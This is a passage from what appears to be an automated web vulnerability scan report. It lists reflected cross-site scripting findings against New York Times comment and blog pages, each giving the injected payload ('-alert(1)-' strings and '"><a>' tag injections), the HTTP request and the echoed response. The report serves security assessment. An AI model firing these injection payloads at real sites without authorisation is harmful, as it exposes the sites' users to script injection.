Content-Length: 82778

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments52017'-alert(1)-'7d721cbfae3';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7646f"><a>ff2a52994e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82760

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crn
...[SNIP]...

3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a88"><a>97992b80823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34566

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5
...[SNIP]...

3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa14"-alert(1)-"f0d8d5fb934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 80401

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
tsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143063";
var s_pagename = "2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 742aa'-alert(1)-'d3686b770d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments742aa'-alert(1)-'d3686b770d1/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments742aa'-alert(1)-'d3686b770d1';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949b9"><a>40112219a54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70874

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink
...[SNIP]...

3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37048"><a>fe7fd4940f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33545

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Botto
...[SNIP]...

3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7977"-alert(1)-"f6aef8543a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70362

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
= "nytimesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143071";
var s_pagename = "2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef09a"><a>6c6cf61beb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 114608

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom
...[SNIP]...

3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd94'-alert(1)-'3641936aba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments2dd94'-alert(1)-'3641936aba3/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 114345

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments2dd94'-alert(1)-'3641936aba3';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53310"><a>4fd6753484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/2010/11/12/a-deficit-of-respect/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 32847

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,Inv1,Inv2,In
...[SNIP]...

3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66476"-alert(1)-"d2cc1166fce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 104936

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Defic
...[SNIP]...
r s_account = "nytimesglobal,nytopinionator";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "289_69231";
var s_pagename = "2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1";
var s_channel = "opinionator";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd9c'-alert(1)-'4a279ffe4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments8cd9c'-alert(1)-'4a279ffe4c1/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 78663

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments8cd9c'-alert(1)-'4a279ffe4c1';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a623d"><a>3466d5f58ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 78729

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S
...[SNIP]...

3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47de7"><a>818b9e1e4e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33885

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott
...[SNIP]...

3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a953"-alert(1)-"fd6c09b8e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 74294

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Reviewi
...[SNIP]...
imesglobal,nytwheels";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "29_75697";
var s_pagename = "2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/?7a953"-alert(1)-"fd6c09b8e6d=1";
var s_channel = "wheels";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2010/11/12/the-acquisition-of-tina-brown/

Issue detail

